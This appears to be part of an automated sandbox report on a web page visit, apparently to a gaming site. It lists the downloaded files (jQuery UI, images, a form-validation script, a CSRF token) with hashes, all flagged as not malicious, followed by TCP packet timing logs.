                                                      SHA1:78489E580ADAEF931E6E5B131DAB556C397E4A1A
                                                      SHA-256:28CE75D953678C4942DF47A11707A15E3C756021CF89090E3E6AA7AD6B6971C3
                                                      SHA-512:BADA3D9A5433AECE7D57020B70B89161E2CA3CF6D2FDB4FBD5D6BF38405813071D35493C8D8232F83D7BE91628A29D436BE7FD9AF918AE68F93022D9584B50B8
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/plugin/js/jquery-ui.min.js?ver=1606790105
                                                      Preview:/*! jQuery UI - v1.12.1 - 2016-09-14.* http://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sortabl
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2515
                                                      Entropy (8bit):7.591453391924123
                                                      Encrypted:false
                                                      SSDEEP:48:kzF5BZoSIqsvmrWoui1Wrs7oPUTYMGarNcZfhGobklPBjbO9kNR:qoSIqUWnY650hGIkJj698R
                                                      MD5:72785CB75935F1B64CCD93D6FB515D5E
                                                      SHA1:14DA40A811EE6667A0B8C1BBC92CDCE69EAB62DE
                                                      SHA-256:5CB7A0008F485EA09FD4CA0F82FEB2402C970E43A18D4C2310C51CF666AFF6A7
                                                      SHA-512:B0FDD9930D56AA03E56B9FE14FB7794F0525B01F4E4AD5D24DC234EC071D175095DD41945D379769F145B93F92B920132C6615D41E15FABFED0E27D238498086
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......PLTE...uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW....uW.uW....uW.uW.uW....uW..........uW................................................................uW.........................uW....uW......Le...]tRNS........Z3.G...g.T*...{qN........7...#.la..A'...l< ..c..wM.y>&.........]F5,....T ......8..$....IDATx....R.P...C).m....j+..e.)V.(.&.2...=....\SLH..........|.sB........................5...|>C`7d.....5...s....s..... ....!..KN4.e.....j...!..K.n..KN*,.....%']...VO,5...,..l.$.....P$0+...l...l..J.F..T..qC..b...Jj.T..f..............r..:.G?&.f.].7.8<........+.%o...Z.^R....2...N!.....rQ.{..P.>5x..CW.^..&.r)g....#K..!>.i....Y.&56..)u]i..C`.g.kx...0$.....W.r...K.T`)G...8!..R..w... Iwj\...O...!i.R...}+.!..,...J$.^..YM.P.89.&.Mz6R{.y....@....C...$..S.OY.~j',f..h..1....H.......N.......k.........5.G....5..P[......#.r.6+..6..K1O8M..jl&
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):40
                                                      Entropy (8bit):4.8153115322251026
                                                      Encrypted:false
                                                      SSDEEP:3:xQcQtLdLsVwWBJ96Yan:cuN6Pn
                                                      MD5:3827163836BA3F20568C2DF5D2BB6F5D
                                                      SHA1:A8187549C89E2DAFFCE94D5073F1FFA23B64045E
                                                      SHA-256:2909CBD27D5F6FB353355B37FB84A018A8145EBC06931F9403143D4CABAB8E35
                                                      SHA-512:A793BBF1418EA2013B0734E96D1197385C9B1783D2B470A574F48F84289105F7EC7D84A98C0BAB2CF037F6953CCC72042485D151E9C382F7F9AA27C4551E8BE0
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/csrf
                                                      Preview:Qm40YOBONhZzF8niHpUst3cy6pxGyS8S8KdqyOXh
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):15380
                                                      Entropy (8bit):4.6621101956404285
                                                      Encrypted:false
                                                      SSDEEP:96:ZRORCQC5WCQCD9CQCwCGCkCmCQC+MiCwCdCuuCkCbmCd9P/ddPojcHoujp1SPZaQ:ZR0RvJdlANu91diXdT59j6IQNHYerS
                                                      MD5:DDC9CAC97E3733C0B8340431BF4E5956
                                                      SHA1:D2101A520D73BD74861323CE59225DE62F5BB5F2
                                                      SHA-256:0EED38BD8F94BC8791459CA259B1F87F0B4EC0F1E1D8EC4A6D7BD213ED1CEC05
                                                      SHA-512:532CA113E03EFE2D00EAC3ED06B379DE6C76432F2A3A9D38A3EA682F5FA8F96F472EBEAE2B68A1E5145F2A825DAD39DDA0FEFD0E51CC67609D8E150E1CFD39A8
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/js/custom/checkinput.js?ver=1606790105
                                                      Preview:var b = false;..$(function() {.. $("#userid").blur(function() {.. checkUseName($(this));.. });.. var checkUseName = function(obj) {.. var username = $.trim(obj.val());.. if (!/^([0-9](?=[0-9]*?[a-zA-z])\w{4,12})|([a-zA-Z](?=[a-zA-Z]*?[0-9])\w{4,12})$/.test(username)) {.. obj.siblings("h4").show().html('.....');.. obj.parent().find("img").show().attr("src", "images/red_icon.png");.. b = false;.. } else {.. obj.siblings("h4").hide();.. obj.parent().find("img").show().attr("src", "images/g_icon.png");.. b = true;.. }.. }.. $("#password1").blur(function() {.. checkPassword($(this));.. });.. var checkrealname = function(obj) {.. var checkrealname = $.trim(obj.val());.. var reg1 = /^[\u4e00-\u9fa5]{2,4}$/;.. if (!reg1.test(checkrealname)) {.. obj.siblings("h4").show().html('.....');.. obj.parent().find(
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):26442
                                                      Entropy (8bit):7.982501367967529
                                                      Encrypted:false
                                                      SSDEEP:768:uwUImFlZOHbLlAdC2ixz+kxweK/hV+N3CarDf6bB58:zUpFlZbC2c+kxw1V+FCaruN58
                                                      MD5:B6A0E05DF2E251D47A49BBE52FD87136
                                                      SHA1:BF12EC125355B55E1C2E570F0A04E57B70C95E81
                                                      SHA-256:A2459C6694689C8C0D196419CD02B0C03E55A1F8F8D6111890C070EADD1EAB21
                                                      SHA-512:92C1C7651DD60A703493D128B7BD4173D736963A01B004BAD5B6651D2E7D3B74F1F46C726E9789EF33C720463B770F14238243E4D97244605C07C49F3B985FD1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE...f..{........................v._............{.%...s.s.........Z..|.....f....N*..k.4............`.K.....0......n.....-> .....f.........R..c...fU..[7....T...Z........yW...n..]..k..'..hD..Ny(..A..5..].....uGx...m.-..L....<v.......qzO....c..B..P.+..F@. -Sl.X...)..j...@A...z{..H.......3............n.4<|....".....Lh..........a.;t...95....<.|.o.P....b$r..g;...i.....t.)=S.<x...@....R.oK...... o.T..N...o0.W.....k2..?....9f..9'.|..]..E...@.}K85e./....>...`....-nt..-......Z..Ew}.U7...f+#.h)vgQ...W^....."0p}.....}dk.......^...L22....VO......Q.O.?D.M\[.5..;..B.F...&......I..y......F...K...#........svq.P="j.aW:.Ip..j...W...c/.&[...../."..[..../...3...z.]...o........l...jdYct......B.....&n ......gl.G}...+...{.......R..."4.jl.[K.E...X...G......./6... .IDATx...XSg...;v.0...D!...$....&D;.I....I...."..T PS...........Rv...7\./(..q\.^..N..~......O.1y~....9..T.}...{3...}......r...........=......&~.=.n.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):27917
                                                      Entropy (8bit):7.983272421406406
                                                      Encrypted:false
                                                      SSDEEP:384:jp3FmE76+ppbrM4enedu98/pBJ0zaYHqtuft9qVE37gbL25Dukb2bV1qg0YK0oyB:tp6yro8TJqaAfHqVEHFabV1aYK0oyB
                                                      MD5:BDAF928BCB7DEE9AF00E294B47996210
                                                      SHA1:C234746607AE19933679102D259C8392C7914D5F
                                                      SHA-256:DF00A69CC011B5A0D2B47CF6AE44961BC84416425B3B1867462FCF0E24627BBA
                                                      SHA-512:48D8AC66217C7E24DBBF412392CA0AFEF94239DD0662D2616D2696473EE4A4AE707F92509C599FE20A9CCC4182E07EC1C3C9A2092DF96A20CABE795F653A556D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/wpqadzg74mj7y.png?ver=1731292166
                                                      Preview:.PNG........IHDR...............^.....PLTE......... ........:..*..#....2/'+5.....!.....-..-4Q...E,.6-3...F!..../.....O3":%............$..L........T[9%/3D..?P)...............X@E`@4:......C..),=g>-K9>7<T.!.KTy.'.( "#&7.......~3..WQ.......`'.GMn..&hB.uO..;.....g-Z2.i1...O}:&%,K<Fk..... ..I.....#.?...E.Y%.,....../..k..E...{....|.N.RCG.w1R....._'!jN5....t.x$...d....@..G.u5..4..5..8..g....zM9..+2?_.j4.F.e*.|o./Zf|....V..:.o..Y+.J...(.j1../....3..waP.G.jC....a.R/.T..T;..9P[..E....]h..<@l..hU.s.....j9f....y.O.mx..{c.RD..k.shC...H@,,./0.Z..gZ@BG.C..g..E.].QPScQW.~....rdk../iu.k...>...`..e..H......D.A.....X...Pr.*VE..X.'?.....|~.W.V..A........hs...AO~..6=......+..[#^.c...u...G..............s..B..].**r.......z.[..#V_d...{..LE.*W..n.@H....Z./.. .@...u...u.].hS......YC..j.A.....9N..N..i.IDATx.l.Ok.`..nq+s...5L..2....@.!O..@pn"..`SZ..r...].^.e ..<.P(.. ...n..+..aoa.'.u..<O.'iC....<Z....b.Lf.ZM.G5..'*GjJU.E...JXfY9..B....A.+.....<(..w.]J.Z.t.....O........6.U..m...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):3395
                                                      Entropy (8bit):7.881110825148547
                                                      Encrypted:false
                                                      SSDEEP:96:DkS/NQONylGvobHEZF+iJ/vU0zsQu8l6j0drtb:4ZgorEZFdjfFl6j05tb
                                                      MD5:B1512E75EB5AE38A96D889A1EE233AB0
                                                      SHA1:89898F381391D68504062B662B387A1C4E3E34D5
                                                      SHA-256:9652C86737768F22614F765F2B1AF2287274FB9007E098B91DD66EFFCD144AB5
                                                      SHA-512:828E55F619BAFE8C029C496D5AA7FAEB0F9FFB334DF1CDBC60F19528C0F97F84922E276A767B58EED27008DA55F0F444904C016FB20296D200AAAC2B0D2A9810
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/159_egame_logo.png?ver=1713931261
                                                      Preview:.PNG........IHDR..............P......PLTE....4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.>6:.../tRNS.... .......'....2.>......iIxq8]..W.-R.Dc~N.^....3IDATx.....@...jP..D..7.w...%9.4'...e.3|.s1...WU.R.R.T*.J.R.T*.k...Lj...lY.f....*.w..a...hB....F.i.vq.q..8.x.o........`. iv.....@A/.$..[8..Z.../._.rZ...n..5... ..._.V...A..j..Q.,ADe.......]...xG..8..h;.....x.7!i..R6T...3W$i# .P....M2..O..+..a.S........G..7.....:%...bm*..Y.Y.tEb..x..P!2.\..$..qf..{&*....7b....qx..P..d......u.g.....F..#..f...h......'JS.#6....w......X}v`.W.wGJ.Aa._~* ..U.I).(.Zgz.o"v%6.w=J.Ea....+H.I.5.S.\....;..M.j.3...S)&6)............p.*<x...'..v.......w.X...........I..bDE.^..b@lkQ.b........1.A\.N...+.z.b.6q5[.n5..Ma.......L@..'.z.....0.n.J....s..z{..HtO...X(.\.3..._D.j...f(.Kp...f..1..g.H.B.-..G....D%Y#1...FC.s\.y.z.T.dA&.>1..K.)LH!......LL.9T.kb. ...&..y{..).Ez....T.9.#i..9!......i(
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 700x255, components 3
                                                      Category:downloaded
                                                      Size (bytes):47441
                                                      Entropy (8bit):7.976228730546613
                                                      Encrypted:false
                                                      SSDEEP:768:eCvdC050OpX2aL2FtoXhTGPmCSRbamaVLFF8lJYEicHywHT4lwDL/xZ1nEcUUyUK:vvsxOpXlCFaimC04WJYySw4OxZ1nyUyb
                                                      MD5:EB2D8A58FF346F9444B76488E2BA2965
                                                      SHA1:C7A905F9E9D5C8A210E01BCDBFB0776189B1ED13
                                                      SHA-256:7D586E647BBDB5D8667A809982B429CD1D4C31AA64B491824806692ECA249DCA
                                                      SHA-512:5F2ABDB27FC7F39274D7A933F50952D46B7195CA481D1D15977AF156EDA73AEDE0F434C7129F730A89BD736A2218C413C213167125CD6A3E69BF25DA97306257
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/other/banner4.jpg?ver=1606891699
                                                      Preview:......JFIF.............C....................................................................C......................................................................................................................................................................................................................................................................|.FJ..I..&...9l"......+.KIB.................................Ks.e.....5...fL...I..j.Q......*..q<......................................U.$.D.5)..,.d."..G..c..GKi.................................$........Y...@,pdY......@...................C.P.yL.|........+..g......iu...et>d.....\....t..............J.;.%......|..=....K...A.y%.|=.v.................W..k...ep....u.d.Zd..^*...iv[\d....d.^~Zn..;Z7Zm..p.[...&........k..#...........H.F..#..X>...........']..l.;6..[.=.......c..-..f...O..../1...\..+c.~....&.m\5 ..........h....Vd..e>...o},Dw...u.....*a....n.V.9..\...2.,NG[.(m.1z.3n.p.|...c......|7p..hm...].../..s:.5.}.b.H.Q..W .=R-G{.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 850 x 332, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):21119
                                                      Entropy (8bit):7.80272011359846
                                                      Encrypted:false
                                                      SSDEEP:384:O+sdVk/P/pDXtoWmRaSn4tmB9I4FQCCh66Yv0x5kOObu:O5du/n4WoRI4FVCh5PObu
                                                      MD5:32A87D100A3AA2D4529EBAD28B40AED8
                                                      SHA1:7C5C6A4BE7545D35BC980C8379534675FE048ADB
                                                      SHA-256:8E0CF84FCD5823A3BDA3B510C142DF920292590B54461741CAEF6C702167D09E
                                                      SHA-512:525456DE55577FC25F7434164CCD72138BEEA8F85951809B523E0D3609A166E1EA7DD72D3DB346470813DD63942CD40158B2F09FACA610E391D2E091E9E6A417
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...R...L......e......tEXtSoftware.Adobe ImageReadyq.e<..R!IDATx....6.v.N..8......C...G...p..........v7Y...(._..o......K.w..u.f.._...t~lK.9}......|.........W..........8y..o.,<Z.['~Lxc:c......0...m..\.-..r3<..P..........p......Yk.......g.{.n).(O...|....w.6.....Y..v.V.G.ZdQ...;.|.3.....a./Z.s.}F.3....Z.7.f..........k...G>...Y6..|.....g...~#3/(9.......dV..q......b..g.M...<..s.G..g.x,.S....?e....[.PK...3..v....K...Y_.U.Q..5kWU].6Y..lw.<..z~..|$.jg..6.....H]j.j\e.........%^f.{.....GroVY^.YuR....).Md...2s..'#q....\....~V.........i..E.|.C...~?RgV...O..U]!.}...)g...]....R.|.h.E..Y.+...Y...V>.vg...0...l.)..U9..v..[V.T.9.Sof<e.H.Iun.WA......+|"C.Y....F.'.V.6Y.....Eo...._...c<ef.?..m.9G}......oZ.z....%...a..Pg..Wp..M/.z.......bu{f.t...%.,vku>..e.L.^e..y{w...`..;.;...v..W.k.........w.C...c...Q.2.8V.]..r3..].d.G...R.?e..z....W....,.......T.....k...3....T.2_f.u+.>)z....;/v.,Gc.j.L[E....W...|..s.*..1..9g....fO.".-.......{.=.t
                                                      No static file info
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 13, 2025 00:47:30.211831093 CET49675443192.168.2.4173.222.162.32
                                                      Jan 13, 2025 00:47:31.737241983 CET49737443192.168.2.4142.250.185.100
                                                      Jan 13, 2025 00:47:31.737291098 CET44349737142.250.185.100192.168.2.4
                                                      Jan 13, 2025 00:47:31.737384081 CET49737443192.168.2.4142.250.185.100
                                                      Jan 13, 2025 00:47:31.737581015 CET49737443192.168.2.4142.250.185.100
                                                      Jan 13, 2025 00:47:31.737596989 CET44349737142.250.185.100192.168.2.4
                                                      Jan 13, 2025 00:47:32.436762094 CET44349737142.250.185.100192.168.2.4
                                                      Jan 13, 2025 00:47:32.437051058 CET49737443192.168.2.4142.250.185.100
                                                      Jan 13, 2025 00:47:32.437066078 CET44349737142.250.185.100192.168.2.4
                                                      Jan 13, 2025 00:47:32.438716888 CET44349737142.250.185.100192.168.2.4
                                                      Jan 13, 2025 00:47:32.438791990 CET49737443192.168.2.4142.250.185.100
                                                      Jan 13, 2025 00:47:32.528361082 CET49737443192.168.2.4142.250.185.100
                                                      Jan 13, 2025 00:47:32.528595924 CET44349737142.250.185.100192.168.2.4
                                                      Jan 13, 2025 00:47:32.576111078 CET49737443192.168.2.4142.250.185.100
                                                      Jan 13, 2025 00:47:32.576131105 CET44349737142.250.185.100192.168.2.4
                                                      Jan 13, 2025 00:47:32.622889996 CET49737443192.168.2.4142.250.185.100
                                                      Jan 13, 2025 00:47:35.476412058 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:35.476466894 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:35.476583004 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:35.477574110 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:35.477588892 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:35.497631073 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:35.497723103 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:35.497833967 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:35.498157978 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:35.498246908 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:36.378392935 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:36.379023075 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:36.379053116 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:36.380564928 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:36.380634069 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:36.383189917 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:36.389261961 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:36.389365911 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:36.389801025 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:36.389866114 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:36.390305996 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:36.390320063 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:36.393484116 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:36.393570900 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:36.396996021 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:36.397182941 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:36.430026054 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:36.441155910 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:36.441217899 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:36.492630005 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.510477066 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.510548115 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.510592937 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.510612965 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.510632992 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.510664940 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.510674953 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.510701895 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.510725021 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.511581898 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.511630058 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.511657000 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.511663914 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.511708975 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.569803953 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.570633888 CET49743443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.570702076 CET44349743154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.570791960 CET49743443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.571578979 CET49743443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.571609020 CET44349743154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.615322113 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.731929064 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.731980085 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.732048988 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.732079029 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.732095957 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.732120991 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.732952118 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.732994080 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.733019114 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.733026028 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.733066082 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.733083963 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.736923933 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.736964941 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.737006903 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.737014055 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.737046957 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.737068892 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.737298012 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.737340927 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.737361908 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.737368107 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.737406969 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.737426043 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.953651905 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.953686953 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.953735113 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.953758001 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.953865051 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.953876972 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.953917980 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.954442024 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.954502106 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.954519987 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.954528093 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.954566002 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:37.954649925 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:37.954703093 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.042159081 CET49740443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.042206049 CET44349740154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.092504978 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.092539072 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.092550039 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.092581034 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.092602968 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.092602015 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.092614889 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.092652082 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.092663050 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.092689037 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.092724085 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.093523026 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.093578100 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.093605042 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.093626022 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.093657017 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.093714952 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.306727886 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.306747913 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.306781054 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.306823015 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.306849003 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.306876898 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.306878090 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.306899071 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.306931973 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.307807922 CET49741443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.307832956 CET44349741154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.343595982 CET49744443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.343652010 CET44349744154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:38.343724012 CET49744443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.344039917 CET49744443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:38.344054937 CET44349744154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:39.747701883 CET44349744154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:39.762892962 CET44349743154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:39.769903898 CET49744443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:39.769933939 CET44349744154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:39.770327091 CET49743443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:39.770355940 CET44349743154.86.18.4192.168.2.4
